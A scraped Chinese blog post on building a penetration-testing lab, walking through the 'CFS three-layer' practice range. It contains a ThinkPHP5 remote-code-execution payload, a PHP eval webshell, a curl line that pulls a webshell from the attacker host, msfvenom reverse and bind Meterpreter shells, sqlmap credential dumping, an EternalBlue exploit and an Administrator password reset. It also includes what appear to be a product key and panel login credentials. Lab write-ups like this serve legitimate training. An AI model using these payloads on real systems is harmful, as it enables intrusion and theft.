渗透测试环境搭建
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了渗透测试环境搭建相关的知识,希望对你有一定的参考价值。
参考技术A https://www.cnblogs.com/cradle-q0518/p/13427657.htmlQC986-27D34-6M3TY-JJXP9-TBGMD
docker search upload-labs
docker pull c0ny1/upload-labs
docker run -dt --name upload -p 80:80 --rm c0ny1/upload-labs
https://vulhub.org/#/docs/install-docker-one-click/
CSF三层主机:渗透测试靶场笔记
文章目录
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略
环境搭建
【CFS三层靶机环境】百度网盘链接:
链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg
提取码: dkcp
解压密码:teamssix.com
搭建好之后,首先修改好虚拟机的兼容性,需要兼容15.x,否则会报错
![image.png](https://img-blog.csdnimg.cn/img_convert/a11175a756cbe398d3ec552f75bf2b2e.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=498&id=u1b76dcbb&margin=[object Object]&name=image.png&originHeight=996&originWidth=912&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88757&status=done&style=none&taskId=u392c560a-c50b-40b7-8046-eec1c5764da&title=&width=456)
之后配置一下虚拟机的网卡,可以参考一下:
![image.png](https://img-blog.csdnimg.cn/img_convert/13381b270834c67c527e2a01ff854f69.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=114&id=u34f04467&margin=[object Object]&name=image.png&originHeight=228&originWidth=863&originalType=binary&ratio=1&rotation=0&showTitle=false&size=17414&status=done&style=none&taskId=u18483e54-0801-4604-8ab3-075d98e760b&title=&width=431.5)
找到下载的文件夹,使用命令
λ copy /b CFS三层靶机环境.7z.* CFS三层靶机环境.7z
![image.png](https://img-blog.csdnimg.cn/img_convert/8e31f597dde5fd9855e43db73c5b5fc5.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=383&id=u0ae075d8&margin=[object Object]&name=image.png&originHeight=766&originWidth=1434&originalType=binary&ratio=1&rotation=0&showTitle=false&size=185395&status=done&style=none&taskId=u885ce17d-6a47-4c86-b7df-5d1469a9b95&title=&width=717)
合并到一起之后,解压缩,双击ovf文件
![image.png](https://img-blog.csdnimg.cn/img_convert/e0030bcd4f4b04a76dfe74df551708d3.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=177&id=u248481ee&margin=[object Object]&name=image.png&originHeight=200&originWidth=838&originalType=binary&ratio=1&rotation=0&showTitle=false&size=19864&status=done&style=none&taskId=ub008f841-8453-492c-862e-f795abed6a7&title=&width=743)
导入即可
如果出现了网络连接不上,自己配置一下网卡
![](https://img-blog.csdnimg.cn/img_convert/2f525a4d20eaae2108a592ea2f7689ad.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&id=uac772235&margin=[object Object]&originHeight=365&originWidth=1126&originalType=url&ratio=1&rotation=0&showTitle=false&status=done&style=none&taskId=u529edb22-3ad5-4958-a2bc-e7655b64024&title=)
环境详细
# 本地win10:
- 192.168.1.1
# Kali:
- 192.168.1.16
# target1:
- 192.168.1.15
- 192.168.22.130
# target2:
- 192.168.22.129
- 192.168.33.128
# target3:
- 192.168.33.129
Xshell可以直接连接
![image.png](https://img-blog.csdnimg.cn/img_convert/fa8e0409eaba504d86fa0dcbe4c956dd.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=404&id=u071e24ac&margin=[object Object]&name=image.png&originHeight=808&originWidth=1299&originalType=binary&ratio=1&rotation=0&showTitle=false&size=132999&status=done&style=none&taskId=u86854ebb-dcb1-4b7d-9a99-ca4f75d84a2&title=&width=649.5)
/etc/init.d/bt restart
访问:192.168.1.14:8888,出现问题![image.png](https://img-blog.csdnimg.cn/img_convert/4840945d7f9b8dec6cc75987d8b7640b.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=286&id=ua36b7908&margin=[object Object]&name=image.png&originHeight=571&originWidth=1815&originalType=binary&ratio=1&rotation=0&showTitle=false&size=105958&status=done&style=none&taskId=ub885e609-cc27-4480-816d-bc522785770&title=&width=907.5)
解决办法:
cd /www/server/panel/data
mv admin_path.pl admin_path.pl.bak
bt default
---------------------------------------------------------
Bt-Panel-URL: http://39.176.195.77:8888/a768f109
username: eaj3yhsl
password: 41bb8fee
Warning:
If you cannot access the panel,
release the following port (8888|888|80|443|20|21) in the security group
登录进去后,创建网站
![image.png](https://img-blog.csdnimg.cn/img_convert/3ac85746843382cd56aeec6f4aaa0670.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=498&id=uf27666b8&margin=[object Object]&name=image.png&originHeight=995&originWidth=1600&originalType=binary&ratio=1&rotation=0&showTitle=false&size=123049&status=done&style=none&taskId=uada05166-b033-4a6d-b44d-469c6ec4af4&title=&width=800)
即可访问
![image.png](https://img-blog.csdnimg.cn/img_convert/97ceb016790aa4eea01d50543dcc7ac6.png#clientId=uc3281aa6-ccc7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=262&id=uf43c487a&margin=[object Object]&name=image.png&originHeight=524&originWidth=1082&originalType=binary&ratio=1&rotation=0&showTitle=false&size=45262&status=done&style=none&taskId=u06d1d559-16ed-4fb4-96fa-88669b9e295&title=&width=541)
在搭建UBuntu的时候会出现密码错误,输入bt可以重置一下密码
Target1
由于是ThinkPHPV5 的版本,在网络上找查payload(在vulhub上可以找到)
![image.png](https://img-blog.csdnimg.cn/img_convert/9683988e64f3af79cede6897ffc02f05.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=392&id=u2bca9fbe&margin=[object Object]&name=image.png&originHeight=784&originWidth=1508&originalType=binary&ratio=1&rotation=0&showTitle=false&size=207459&status=done&style=none&taskId=ufe6979bb-d7b4-4f10-9e1a-cf25f8746cc&title=&width=754)
#POC
http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
更改poc,改为木马上传
#木马命令
echo "<?php @eval($_POST['pw']);?>" > go.php
#上传URL
http://192.168.1.15/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['pw']);?>" > go.php
# 后来发现是过滤了POST
# 我想到的方法是,在自己的web服务器上先上传好自己的木马文件,然后执行将木马内容写入即可
curl 192.168.1.16/hack/hackyou > go.php
http://192.168.1.15/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl 192.168.1.16/hack/hackyou > go.php
![image.png](https://img-blog.csdnimg.cn/img_convert/98ec2102d605abc2f97cfc12e9043ff9.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=522&id=u5bd3c2de&margin=[object Object]&name=image.png&originHeight=1043&originWidth=1543&originalType=binary&ratio=1&rotation=0&showTitle=false&size=139383&status=done&style=none&taskId=uec2255be-f9f2-46ad-ace5-db55732de1f&title=&width=771.5)
上线,至此,漏洞利用完成,可以看到flag
Target2
反弹shell
反弹Shell在msf上
# 1.在Target1上生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=1111 -f elf >t1.elf
# 2.接受反弹:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 1111
exploit
![image.png](https://img-blog.csdnimg.cn/img_convert/c9bfc1a57ac6e6d65dd1e29afc018ca5.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=408&id=u61796c56&margin=[object Object]&name=image.png&originHeight=815&originWidth=2027&originalType=binary&ratio=1&rotation=0&showTitle=false&size=211814&status=done&style=none&taskId=ua3aea75f-926d-4006-87c2-5e5dbfc0095&title=&width=1013.5)
通过shell执行ip addr可以发现目标的网段是22网段的,(多此一举)
![image.png](https://img-blog.csdnimg.cn/img_convert/13f99e7e90409cf84461d717d59da7ec.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=271&id=u0cb73ee3&margin=[object Object]&name=image.png&originHeight=541&originWidth=987&originalType=binary&ratio=1&rotation=0&showTitle=false&size=66206&status=done&style=none&taskId=uc9f0ee4a-21c9-45db-af4e-9c5987442a7&title=&width=493.5)
信息收集
# 在目标机上配置
# 信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
![image.png](https://img-blog.csdnimg.cn/img_convert/215eef9d25124b0d1cff7a2fbfe493f0.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=329&id=u2bd44a5c&margin=[object Object]&name=image.png&originHeight=657&originWidth=868&originalType=binary&ratio=1&rotation=0&showTitle=false&size=66889&status=done&style=none&taskId=u61096079-b6e3-4a83-8115-288497fc4cc&title=&width=434)
kali已经获取了target1的权限,并在上面添加了22网段的路由,相当于现在kali能对22网段进行安全测试
配置代理
# 解决当前控制端主机没有合适的工具或者脚本,需要使用socket代理:
msfconsole
use auxiliary/server/socks_proxy
show option
set srvport 2222
# 在当前计算机上建立socket5协议端口,让本机链接kali socket5协议,本机运行工具将走这个协议。
# kali为跳板
![image.png](https://img-blog.csdnimg.cn/img_convert/93a74ea2e878c832d9363cc337e68f3e.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=205&id=fb9et&margin=[object Object]&name=image.png&originHeight=410&originWidth=748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=40789&status=done&style=none&taskId=u4da91c42-a4e7-42f2-8591-1f765686dc0&title=&width=374)
# 使用Proxifer的方法
1. 配置文件->代理服务器->输入代理IP->选择socket5
2. 代理规则->添加->添加应用程序(添加漏洞工具)
3. 如果需要环境支持,可以走全局策略
现在就需要kali去连接这个socket代理
# 配置kali工具 proxychains
vim /etc/proxychains4.conf
# 添加代理配置
socks5 192.168.1.16 2222
# 其实kali不需要配置,但是其他Linux需要配置
# 利用nmap查询到target2的IP地址,走socket协议
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
> 发现IP:192.168.22.129开放
访问web网站:
![image.png](https://img-blog.csdnimg.cn/img_convert/736cf1afb37634132d38af34a0d1ab9d.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=506&id=ud9c56dd5&margin=[object Object]&name=image.png&originHeight=1012&originWidth=1952&originalType=binary&ratio=1&rotation=0&showTitle=false&size=473496&status=done&style=none&taskId=u13f1706d-7021-498f-9f88-1ca9f643a34&title=&width=976)
在注释页面可以看见提示
![image.png](https://img-blog.csdnimg.cn/img_convert/dd4c4e87622f3b438bea8501767f70aa.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=78&id=ueb7422e6&margin=[object Object]&name=image.png&originHeight=156&originWidth=784&originalType=binary&ratio=1&rotation=0&showTitle=false&size=10304&status=done&style=none&taskId=u84d3e14c-d994-4bba-905a-5af329733d7&title=&width=392)
sql注入,直接跑sqlmap
# 爆数据库
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --dbs
[*] bagecms
[*] information_schema
[*] test
#爆当前数据库
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --current-db
[*] bagecms
#爆表
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -D bagecms --tables
Database: bagecms
[18 tables]
+-------------------+
| bage_ad |
| bage_admin |
| bage_admin_group |
| bage_admin_logger |
| bage_attr |
| bage_attr_val |
| bage_catalog |
| bage_config |
| bage_link |
| bage_page |
| bage_post |
| bage_post_2tags |
| bage_post_album |
| bage_post_comment |
| bage_post_tags |
| bage_question |
| bage_special |
| bage_upload |
+-------------------+
#爆字段
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -D bagecms -T bage_admin --columns
Database: bagecms
Table: bage_admin
[15 columns]
+-----------------+----------------------+
| Column | Type |
+-----------------+----------------------+
| create_time | int(10) |
| email | varchar(100) |
| group_id | smallint(5) unsigned |
| id | int(10) unsigned |
| last_login_ip | char(15) |
| last_login_time | int(10) |
| login_count | int(10) unsigned |
| mobile | varchar(20) |
| notebook | text |
| password | char(32) |
| qq | varchar(15) |
| realname | varchar(100) |
| status_is | enum('Y','N') |
| telephone | varchar(20) |
| username | char(50) |
+-----------------+----------------------+
# 爆账号
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -D bagecms -T bage_admin -C username --dump
# 爆密码
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -D bagecms -T bage_admin -C password --dump
# 爆的时候需要破解一下
+-------------------------------------------+
| password |
+-------------------------------------------+
| 46f94c8de14fb36680850768ff1b7f2a (123qwe) |
+-------------------------------------------+
找管理员界面,输入robots.txt
![image.png](https://img-blog.csdnimg.cn/img_convert/326510c038a540a5ddeba7de49e619e5.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=161&id=u3768c1a0&margin=[object Object]&name=image.png&originHeight=322&originWidth=807&originalType=binary&ratio=1&rotation=0&showTitle=false&size=22932&status=done&style=none&taskId=ud25a67ff-04c1-4e1e-8f9a-7e47ff98dee&title=&width=403.5)
请求:http://192.168.22.129/index.php?r=admini 输入账号密码即可
首页可以找到flag
在模板里可以看见文件
![image.png](https://img-blog.csdnimg.cn/img_convert/90c388c1864e783c98f81700274b9ef7.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=457&id=u84a03ece&margin=[object Object]&name=image.png&originHeight=914&originWidth=1259&originalType=binary&ratio=1&rotation=0&showTitle=false&size=145476&status=done&style=none&taskId=u7133be9a-35a0-4e68-8599-2e86d3773b5&title=&width=629.5)
写入一句话木马
![image.png](https://img-blog.csdnimg.cn/img_convert/26c90d6b950176471d494271cf6e25cf.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=537&id=ufae22687&margin=[object Object]&name=image.png&originHeight=1073&originWidth=1742&originalType=binary&ratio=1&rotation=0&showTitle=false&size=190700&status=done&style=none&taskId=uc27e7ed7-f3e4-4658-8fbd-41bef51a9d2&title=&width=871)
连接
![image.png](https://img-blog.csdnimg.cn/img_convert/410c34b015b281b7301ef35ae53a6a2c.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=231&id=uc3a244f4&margin=[object Object]&name=image.png&originHeight=461&originWidth=835&originalType=binary&ratio=1&rotation=0&showTitle=false&size=29734&status=done&style=none&taskId=u82e2106b-b17b-45ff-b9e7-b35936c721d&title=&width=417.5)
![image.png](https://img-blog.csdnimg.cn/img_convert/59a2d0336d28d6fd8a0c6ab2d5e36eed.png#clientId=u0040a474-00ad-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=525&id=ud03d201d&margin=[object Object]&name=image.png&originHeight=1049&originWidth=1456&originalType=binary&ratio=1&rotation=0&showTitle=false&size=166383&status=done&style=none&taskId=u838da691-e05b-4a10-ac54-30c29223957&title=&width=728)
又可以找到一个flag
# 中国菜刀没有代理设置,可以用代理工具Proxifier或SocksCap64载入代理进行进程访问测试
# 生成正向后门:
# t2没有46路由,如果生成之前的payload,绑定的是46网段的木马反向连接,所以这个时候需要生成正向连接后门
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
# 放到菜刀上运行
# 访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set LPORT 3333 --端口可能出现问题,建议出现问题的时候及时更换端口
exploit
# 信息收集及配置访问
# 获取网络接口:
run get_local_subnets
# 查看路由地址:
run autoroute -p
# 添加路由地址:
run autoroute -s 192.168.33.0/24
Target3
proxychains4 nmap -Pn -sT 192.168.33.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 11:05 CST
Nmap scan report for 192.168.33.129
Host is up (0.0012s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49157/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds
可以看到,这是开放了129、445、3389 端口的windows操作系统
尝试使用永恒之蓝进行攻击
#测试是否有漏洞
use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞
set rhosts 192.168.33.129
run
[+] 192.168.33.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 漏洞利用,记得要把火绒关了……
use exploit/windows/smb/ms17_010_psexec //验证漏洞
set payload windows/meterpreter/bind_tcp //正向连接
set RHOSTS 192.168.33.129 //攻击目标
set RHOST 192.168.33.129 //连接目标
exploit
shell
#连接成功后修改账号密码
shell
net user
net user Administrator 123
# 在物理机上使用socket代理然后连接到远程桌面
Flag
target1:flage2D3aFdasde
target2:flageS3sd1IKarw flag23ASfqwr4t2e flagqEa12Nasd1a
以上是关于渗透测试环境搭建的主要内容,如果未能解决你的问题,请参考以下文章
VulnHub渗透测试实战靶场 - ACID: SERVER